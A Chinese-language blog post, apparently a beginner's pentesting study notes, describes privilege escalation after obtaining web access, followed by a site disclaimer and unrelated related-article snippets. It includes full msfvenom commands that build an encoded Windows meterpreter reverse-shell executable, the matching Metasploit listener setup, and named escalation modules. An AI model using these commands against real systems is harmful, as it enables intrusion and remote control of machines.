web权限到系统权限 内网学习第一天 权限提升 使用手工还是cs???msf可以不??

现在开始学习内网的相关的知识了,我们在拿下web权限过后,我们要看自己拿下的是什么权限,可能是普通的用户权限,这个连添加用户都不可以,这个时候我们就要进行权限提升操作了。

权限提升这点与我们后门进行内网渗透是乘上启下的,没有权限进行什么的操作都比较难进行。

手工进行权限提升

他的话就比较的慢,而且在网上找到的exp可能是用不了的,因为你的真实环境与作者写的exp的话是有差距的,很容易失败。所以在手工方面我个人是不怎么建议的,但是你要了解手工是怎么进行权限提升的。

使用msf进行权限提升:

我们打开msf工具,我们要制作后门文件,因为我们以及拿下web权限了,我们可以上传文件的操作,使用msf制作后门文件的代码我的是这样:我试过一些没有成功。我的命令是这样的

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.199.129 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/test1.exe

第一个是我以前运行不了的命令,我不知道为什么就是没有后门程序出来

然后下面这个是可以运行的

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.163.131 LPORT=2222 -f exe > 222.exe  

我们在进行操作的时候我们先要理解参数的含义:下面我们来看看

-e 免杀的编码(msf自带的编码器)  
-b
 
去除坏字符对我们payload的操作
-o导出位置和名称
-p使用什么来进行来连接
-i迭代的次数
-f生成的格式

 参数大概就是这样我们下面来看看具体的操作,我们先使用msf工具生成后门程序然后在进行上传的操作。

我选择了222.exe文件然后在到上传的地方执行这个文件。

我们在执行的时候要使用msf工具开启监听功能:

下面是设置监听状态的   可以看看语雀的系统权限提升的那点来进行的操作     
监听完了过后要切换出来使用background使用这个命令来进行操作   use post/multi/recon/local_exploit_suggester  自动化的模块
要注意设置会话就是监听的时候你的会话参数   set session 多少这点要对应
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.163.131
set LPORT 2222
exploit

我们在配置监听的时候要与你创建的后门程序要与之对应的操作,我们然后在进行使用这个程序。

在kali中我们可以看见有主机上线了

 然后我们在进行测试操作

然后我们在进行权限提升。

我们先来看看半自动化的模块的操作:

先要切换出来,要不然会出问题的。

use post/windows/gather/enum_patches这个模块就是半自动模块

这点得到了exp文件跟我们手工是差不多的,我们还是直接使用全自动模块

要设置会话,前面的都是要设置会话的,会话就是你开始监听看见上线的session 数字

到这点就等他完成,然后你在进行使用相应的模块来进行权限提升

最后一步经常会出现创建会话失败的提示,你在看看是不是你配置的问题。

我这点也是没有成功的,可能是这个漏洞没有成功。没有成功我也不知道为什么。

大概的流程就是这样,我们使用msf工具来进行提权就是这样的。

cs工具来进行提权操作

cs是图形化的更加的好操作:我们先下载了谢公子的cs插件

我们先是在本地进行测试的。也是先配置了cs的团队服务器,然后进行启动。

我这里是启动了然后测试了的,我们先来到当前文件的sever这个文件下面有teamsever这个文件

我们然后在进行连接的操作,也就是配置

然后进入窗口,进行操作。

先改一下会话,让我们输入的命令可以更快的执行。

这点就可以进行相对应的权限提示操作。这里面的功能非常的强大,我们在进行后面的内网渗透的使用还要抓取里面的密码等等的操作,后期会经常使用cs这个工具

可以使用工具来进行权限提升的操作,还可以使用工具来进行内网的信息收集。

我在后面学习的时候会在来说说这个工具的,现在就说到这里。这个工具很强大!!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/864918.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

MySQL:设计数据库与操作

设计数据库 1. 数据建模1.1 概念模型1.2 逻辑模型1.3 实体模型主键外键外键约束 2. 标准化2.1 第一范式2.2 链接表2.3 第二范式2.4 第三范式 3. 数据库模型修改3.1 模型的正向工程3.2 同步数据库模型3.3 模型的逆向工程3.4 实际应用建议 4. 数据库实体模型4.1 创建和删除数据库…

Linux 磁盘空间清理

1.检查磁盘使用情况 #显示每个挂载点的磁盘使用量,以及可用空间和使用率 df -h #显示当前目录的全部文件和目录(包括隐藏的),以MB显示 ll -h 2. du查看最大的目录或文件 #逐级检查某个目录下各个子目录的大小。从根目录开始,逐级…

基于x86+FPGA+AI轴承缺陷视觉检测系统,摇枕弹簧智能检测系统

一、承缺陷视觉检测系统 应用场景 轴类零件自动检测设备,集光、机、软件、硬件,智能图像处理等先进技术于一体,利用轮廓特征匹配,目标与定位,区域选取,边缘提取,模糊运算等算法实现人工智能高…

提高候选人的招聘感受:成功的策略

大约78%的候选人表示,他们的整体应聘体验表明企业对员工的关注。然而,超过一半的候选人透露,他们在招聘过程中有过负面的候选人经历,80%的候选人在经历了令人失望的招聘过程后会公开与他人分享他们的不良经历。 但也有一线希望&am…

某某市信息科技学业水平测试软件打开加载失败逆向分析(笔记)

引言:笔者在工作过程中,用户上报某某市信息科技学业水平测试软件在云电脑上打开初始化的情况下出现了加载和绑定机器失败的问题。一般情况下,在实体机上用户进行登录后,用户的账号信息跟主机的机器码进行绑定然后保存到配置文件&a…

第十四届蓝桥杯省赛C++B组E题【接龙数列】题解(AC)

需求分析 题目要求最少删掉多少个数后,使得数列变为接龙数列。 相当于题目要求求出数组中的最长接龙子序列。 题目分析 对于一个数能不能放到接龙数列中,只关系到这个数的第一位和最后一位,所以我们可以先对数组进行预处理,将…

C++初学者指南-3.自定义类型(第一部分)-析构函数

C初学者指南-3.自定义类型(第一部分)-析构函数 文章目录 C初学者指南-3.自定义类型(第一部分)-析构函数特殊的成员函数用户定义的构造函数和析构函数RAII示例:资源处理示例:RAII记录零规则 特殊的成员函数 T::T()默认构造函数当创建新的 T 对象时运行。…

电脑录音方法:电脑怎么录音?5招轻松搞定录音!

想要从麦克风或系统音频录制电脑声音吗?这是一项简单的任务。本文将为您介绍5种最佳且最简单的方法,包括使用Windows系统自带的录音工具来录制电脑音频,在线音频录音软件和专业的第三方电脑录音软件。这些工具都能够很好地帮助您完成电脑怎么…

一款十六进制编辑器,你的瑞士军刀!!【送源码】

软件介绍 ImHex是一款功能强大的十六进制编辑器,专为逆向工程师、程序员以及夜间工作的用户设计。它不仅提供了基础的二进制数据编辑功能,还集成了一系列高级特性,使其成为分析和修改二进制文件的理想工具。 功能特点 专为逆向工程、编程和夜…

verilog实现PID控制

1 原理讲解 距离上一次说PID算法的事情过去蛮久了,今天又重新看了看PID的代码,其实还是存在一些不合理的地方。 整理归纳了一下原理,位置式和增量式的变化。 2 工程实现 timescale 1ns / 1psmodule pid_controller(input clk,input r…

【ARM系列】GIC600AE功能安全

GIC600AE在原GIC600版本基础上增加了FuSa功能,所增加的FuSa特性都集成在GIC600外围,不会改变原GIC600的功能。 GIC600AE主要安全机制分布图: GIC-600AE包含以下FuSa安全机制: lockstep logic protection 通过添加duplication l…

C++ 类与对象(中)

C 类与对象(中) 1. 类的6个默认成员函数2. 构造函数2.1 概念2.2 特性 3.析构函数3.1 概念3.2 特性 4. 拷贝构造函数4.1 概念4.2 特征 5.赋值运算符重载5.1 运算符重载5.2 赋值运算符重载 1. 类的6个默认成员函数 如果一个类中什么成员都没有&#xff0c…

数据库操作-DML和DQL

DML DML英文全称是Data Manipulation Language(数据操作语言),用来对数据库中表的数据记录进行增、删、改操作。 添加数据(INSERT) 1.指定字段添加数据: insert into 表名 ( 字段名 1, 字段名 2) values ( 值 1, 值 2); 2…

【面试题】TLS和SSL协议的区别

TLS(Transport Layer Security)和SSL(Secure Sockets Layer)协议都是用于在网络上建立安全通信连接的协议,但它们在多个方面存在区别。以下是TLS和SSL协议之间区别的详细分析: 1. 发展历程与标准化 SSL&a…

企业本地大模型用Ollama+Open WebUI+Stable Diffusion可视化问答及画图

最近在尝试搭建公司内部用户的大模型,可视化回答,并让它能画图出来, 主要包括四块: Ollama 管理和下载各个模型的工具Open WebUI 友好的对话界面Stable Diffusion 绘图工具Docker 部署在容器里,提高效率 以上运行环境…

20240627构造专题

写在前面:出场即巅峰(明日模拟赛RP) 一.何为构造 就是通过对一道题题面的分析可以发现某种规律(类似于不完全归纳法),然后发掘本质,就可以很快的解题,但是显然我还没有掌握 二.一…

基于星火大模型的群聊对话分角色要素提取挑战赛Task1笔记

基于星火大模型的群聊对话分角色要素提取挑战赛Task1笔记 跑通baseline 1、安装依赖 下载相应的数据库 !pip install --upgrade -q spark_ai_python2、配置导入 导入必要的包。 from sparkai.llm.llm import ChatSparkLLM, ChunkPrintHandler from sparkai.core.messages…

操作系统大题复习

磁盘调度算法 一次磁盘读写需要的时间 寻道时间 先来先服务FCFS 优点:公平 缺点:性能差,寻道时间长 最短寻道时间有限SSTF 缺点:可能产生饥饿现象 扫描算法SCAN 优点:不会产生饥饿现象 缺点:响应频率…

Node.js学习(一)

Node.js安装与入门案例: 需求:点击按钮,请求本地目录指定文件的内容,并显示在页面上 刚入门肯定想着直接写相对路径请求指定路径数据就行了,可是会发现不行。 网页运行在浏览器端,通常后续要发布&#xf…

docker部署wg-easy和firefly

Background WireGuard是一种新型的VPN协议,它通过在内核层运行,提供高效、安全、简单和现代的VPN解决方案。wg-easy是一个专为简化 WireGuard VPN配置和管理而设计的工具,提供了界面化的管理,进一步降低WireGuard 的使用门槛,让用户无需深入了…